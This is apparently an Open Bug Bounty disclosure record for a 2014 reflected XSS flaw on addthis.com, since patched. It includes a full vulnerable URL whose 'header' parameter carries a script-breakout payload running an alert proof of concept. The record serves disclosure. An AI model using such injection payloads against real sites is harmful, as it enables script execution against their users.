addthis.com XSS vulnerability

2014-07-18T10:50:00
ID OBB:46843
Type openbugbounty
Reporter NewLife705
Modified 2014-07-18T10:52:00

Description

Vulnerable URL:
http://www.addthis.com/get/follow-code?style=vs&header;=Follow+Us%22%3E%3C/script%3E%3Cscript%3Ealert(%27xssposed%27)%3C/script%3E&uid;%255Bfacebook%255D=Thereadynation&uid;%255Btwitter%255D=Thereadynation&=uid%255Blinkedin%255D&=uid%255Bgoogle%255D&=uid%255Byoutube%255D&=uid%255Bflickr%255D&=uid%255Bvimeo%255D&=uid%255Bpinterest%255D&=uid%255Binstagram%255D&=uid%255Bfoursquare%255D&=uid%255Btumblr%255D&=uid%255Brss%255D&analytics;=0
Details:

Description| Value
---|---
Patched:| Yes, at 06.01.2015
Latest check for patch:| 06.01.2015 12:19 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 189
Google Pagerank| 10
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 18 July, 2014 10:50 GMT
Vulnerability existence verified and confirmed| 18 July, 2014 10:52 GMT